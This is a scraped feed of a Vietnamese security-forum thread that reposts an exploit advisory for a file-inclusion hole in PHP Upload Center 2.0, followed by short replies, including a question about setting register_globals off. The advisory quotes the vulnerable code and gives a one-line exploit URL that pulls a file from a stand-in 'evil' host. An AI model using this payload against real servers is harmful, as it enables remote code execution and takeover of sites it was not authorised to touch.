<![CDATA[Latest posts for the topic "PHP Upload Center 2.0"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net PHP Upload Center 2.0 Code:
*************************************************************************************************************************
                                                              					          		 
			               			 Coding 4 Fun     						 
			                                      						  		 
*************************************************************************************************************************
													  		 
* Name = PHP Upload Center v2.0 ; 											 
													  		 
* Class = Remote/Local File Inclusion ;											 
															 
* Download = http://skrypty.webpc.pl/pobierz.php?id=58 ;				 			         
													  		 
* Found by = GregStar (gregstar[at]c4f[dot]pl) (http://c4f.pl) ;				          		 
												  	  		 
-------------------------------------------------------------------------------------------------------------------------
													  		 
Vulnerable Code in activate.php												 
															 
line 66-70														 
															 
...															 
															 
 if (!isset($language))													 
  $language=$dft_language;												 
if ($language=="")													 
  $language=$dft_language;												 
require("include/${language}.php"); <== Local incl.								 
															 
...															 
	

line 164

...

include($footerpage);  <== Remote incl.

...


Code in include/en.php (and other language files)

line 5-7

...

$headerpage="include/header.htm";
$footerpage="include/footer.htm"; <==
$infopage="include/info.htm";

...

												  		 
- Ex. :	

  														 
 http://[target]/[path]/activate.php?language=conf&footerpage=http://evil?								 
															 
															 
															 
															 
*************************************************************************************************************************
Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,rfl,d3m0n,java,reyw,kw@ch.	  		 
												          		 
*************************************************************************************************************************
Nguồn : milw0rm.com]]>
/hvaonline/posts/list/4816.html#28285 /hvaonline/posts/list/4816.html#28285 GMT
PHP Upload Center 2.0 /hvaonline/posts/list/4816.html#28287 /hvaonline/posts/list/4816.html#28287 GMT PHP Upload Center 2.0

binbinbinbin wrote:
k hiểu gì cả 
Không hiểu gì cả là không hiểu những gì ? Những bài viết đại loại như thế này vui lòng đừng gởi lên diễn đàn hoặc get a warning . Thân]]>
/hvaonline/posts/list/4816.html#28416 /hvaonline/posts/list/4816.html#28416 GMT
PHP Upload Center 2.0

binbinbinbin wrote:
k hiểu gì cả 
require("include/${language}.php"); <== Local incl. include($footerpage); <== Remote incl. Chú ý đọc kỹ bài nhé bạn.]]>
/hvaonline/posts/list/4816.html#28517 /hvaonline/posts/list/4816.html#28517 GMT
PHP Upload Center 2.0 register_globals=Off trong file cấu hình PHP có phải không ạ? Nếu không thể can thiệp vào file cấu hình PHP thì làm cách nào có thể khắc phục lỗi này?]]> /hvaonline/posts/list/4816.html#28610 /hvaonline/posts/list/4816.html#28610 GMT PHP Upload Center 2.0 /hvaonline/posts/list/4816.html#30516 /hvaonline/posts/list/4816.html#30516 GMT PHP Upload Center 2.0
[/url]]]>
/hvaonline/posts/list/4816.html#33599 /hvaonline/posts/list/4816.html#33599 GMT